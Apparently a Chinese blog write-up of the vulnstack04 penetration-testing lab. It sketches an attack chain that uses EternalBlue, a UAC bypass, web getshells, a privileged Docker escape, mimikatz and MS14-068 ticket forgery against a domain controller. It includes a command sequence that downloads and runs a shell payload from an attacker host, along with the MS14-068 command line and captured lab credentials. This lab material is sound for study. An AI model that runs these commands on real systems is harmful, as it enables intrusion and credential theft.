红日靶机vulnstack04【半总结】

这次环境是3台机器,

web服务器:000000 、DC:000000ydc. 、 win7

web服务器改ip有点麻烦,因为需要root用户才能改,给的ubuntu改不了。
所以我就进入高级模式下,修改了root用户的密码
关于虚拟机没有ipIP解决方案
然后再切到root用户修改ip
在这里插入图片描述

win7

这台机器最麻烦,因为UAC开启最高模式,所以无论执行什么东西,都要输入账号密码
在这里插入图片描述

这里我的思路是先用msf的永恒之蓝拿到shell,然后再用下面这个链接去绕过UAC,提权为system权限。然后利用这个system再创建一个管理员账号,用这个管理员账号手动关闭UAC

UAC不提示绕过

exploit/windows/local/bypassuac
https://blog.csdn.net/qq_45300786/article/details/111409422

上线:这里用的是tomcat的getshell

struts2的getshell
tomcat的getshell
phpmyadmin的getshell
在刚刚shell.jsp上分别执行

wget http://192.168.31.96/shell.elf
chmod 777 shell.elf
./shell.elf

docker逃逸

换思路吧

利用–privileged特权模式逃逸

权限问题

假冒临牌,再次进入shell,使用mimikatz
都是上传mimikatz获取密码

拿下域控

利用ms14-068伪造票据
https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

ms14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123
// ms14-068.exe -u 域成员名@域名.com -s 域成员sid -d 域控制器ip地址 -p 域成员密码

在这里插入图片描述

有了域成员的票据后,copy到域控机上,并执行反弹
在这里插入图片描述
往域控上传mimikatz,拿到密码administrator/!QAZ2wsx
在这里插入图片描述
在这里插入图片描述

参考文章:

红日安全ATT&CK靶机实战系列之vulnstack4

猜你喜欢

转载自blog.csdn.net/qq_45300786/article/details/120616602
今日推荐